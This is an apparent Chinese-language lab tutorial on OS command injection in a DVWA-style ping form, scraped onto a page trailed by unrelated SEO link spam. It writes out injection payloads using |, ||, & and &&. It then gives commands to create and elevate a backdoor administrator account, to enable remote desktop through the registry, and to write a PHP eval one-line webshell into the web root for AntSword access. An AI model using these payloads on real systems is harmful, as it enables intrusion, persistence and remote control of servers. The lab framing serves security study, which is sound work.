当前位置: 首页 > wzjs >正文

wordpress图片代码seo网站推广软件排名

wordpress图片代码,seo网站推广软件排名,十大办公室设计公司,东莞开发方案公司2. 原理 在根源上应用系统从设计上要给用户提供一个指定的远程命令操作的接口。漏洞主要出现在常见的路由器、防火墙、入侵检测等设备的web管理界面上。在管理界面提供了一个ping服务。提交后,系统对该IP进行ping,并且返回结果。如果后台服务器并没有对…

2. 原理

  1. 在根源上应用系统从设计上要给用户提供一个指定的远程命令操作的接口
  2. 漏洞主要出现在常见的路由器、防火墙、入侵检测等设备的web管理界面上。在管理界面提供了一个ping服务。
  3. 提交后,系统对该IP进行ping,并且返回结果。
  4. 如果后台服务器并没有对其进行严格的过滤或者筛选时,那攻击者提交一个具有危险的命令就会被后台执行,从而可以进行控制整个后台服务。
  5. 要掌握过滤

3. 执行方式

管道符:

“ | ” 直接执行后面的语句 ping127.0.0.1whoami

“ || ” 前面的语句执行出错则执行后面的语句 ping127.o.0.1jwhoami

“ & ” 前面的语句为假则执行后面的语句 ping127.0.0.1&whoami

”&&“ 前面的语句为假,直接出错,前面的语句为真,执行后面的语句 ping127.0.0.1&&whoami

4. 符号操作

4.1. |whoami

这是一个简单的命令执行,输入网址进行ping服务

我们使用上面的管道符进行实验

172.220.52.186|whoami

| :这个是不管前面是什么,直接执行后面的语句

IP地址|命令

命令执行成功如上图所示

4.2. ||ipconfig

前面出错执行后面语句

asdfa||ipconfig 命令执行查看ip

4.3. &whoami

哪一个对了执行哪一个

&:当前面一个出错则可以执行后面的,

asdf&whoami

前面ping的通则执行前面的 172.220.52.186&whomi

4.4. &&ipconfig

前面的语句为假,直接出错,前面的语句为真,执行两个语句

ping127.0.0.1&&whoami 前面正常,两个执行

27.0.0.1&&whoami,出错,后面不执行

上面该dvwa靶场实验练习管道符,管道符为命令执行重要符号。

熟悉了管道符正常操作后进行实战

5. 模拟远程连接

任务:通过命令执行漏洞,对目标靶机侵入创建虚拟账户,并对其进行远程访问。

熟记指令

  1. 创建用户:net user yuancheng 123/add //创建yuancheng密码为123
  2. 查看用户:net user
  3. 将用户添加到管理员组: 127.0.0.1&net localgroup Administrators yuancheng /add
  4. 开启远程管理服务: 127.0.0.1&net user yuancheng /active:yes

特况:

如果连不上可能远程桌面功能没有打开,使用如下命令打开:

asdf&add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


5.1. 开始

asdf&net user yuancheng 123456 /add

呃,指令不成功,直接去靶机创建用户并提升为管理员

net user yuancheng 123456 /add //如下图所示

net localgroup Administrators yuancheng /add //提管理员

远程连接

输入密码

ok,连接成功

6. 写马

写入一句话木马并使用webshell连接

熟记指令:

  1. 查看当前路径 chdir //查看路径,之后将一句话木马写入该路径
  2. 查看 C 盘下的文件 dir C:\ //可以看到C盘文件
  3. 写入一句话木马、用 webshell 管理工具连接成功 写入一句话木马、用 webshell 管理工具连接
  4. echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php
  5. 蚁剑连接

6.1. 开始

查看路径

dir C:\ 查看文件情况

将其木马写入www即可

echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php

使用蚁剑连接,在木马存在的目录

C:\phpstudy\PHPTutorial\WWW\webshell.php

可以查看到文件

http://www.dtcms.com/wzjs/125505.html

相关文章:

  • 企业网站关于我们b2b平台运营模式
  • 安居客网站是用什么程序做的做网站用什么软件
  • 想在淘宝上找网站建设的靠谱吗?网站做优化
  • 无锡有哪些软件开发的公司网站优化工具
  • 网站建设衤金手指花总十五嘉兴百度快照优化排名
  • 有的网站打不开是什么原因呢友情链接
  • 企业网站网址友情链接查询友情链接检测
  • 做电影资讯网站算侵权吗同城引流用什么软件
  • 比较好看的网站网络seo是什么意思
  • 安徽省建设厅到底哪个网站好的产品怎么推广语言
  • javaweb是不是做网站的关键词seo教程
  • 沈阳网站建设推广全能优化大师
  • 网站建设的公司第七页项目外包平台
  • 成都php网站建设工程师产品推广文案范例
  • 把名字设计成logo免费seo关键词优化服务
  • 西宁房地产网站建设自媒体人15种赚钱方法
  • 做爰全过程免费视频网站网址制作
  • 法治与安全做讲座网站高质量软文
  • 有哪些网站做的比较好看的图片百度金融
  • 做网站的工具怎么使用微信营销系统
  • 台州网站定制建立网站的基本流程
  • 网站建设页面美工什么是白帽seo
  • 微官网制作一般多少钱上海百度推广优化排名
  • 有哪些免费推广网站seo查询官网
  • 下载正品官方网站seo基础知识考试
  • 天津网站建设维护做好网络推广
  • 南宁设计网站百度搜索引擎广告投放
  • 58同城机械加工订单淘宝seo是指什么
  • 饿了吗网站做的比较好的地方百度竞价账户
  • 官方网站建设费用关键词优化公司排行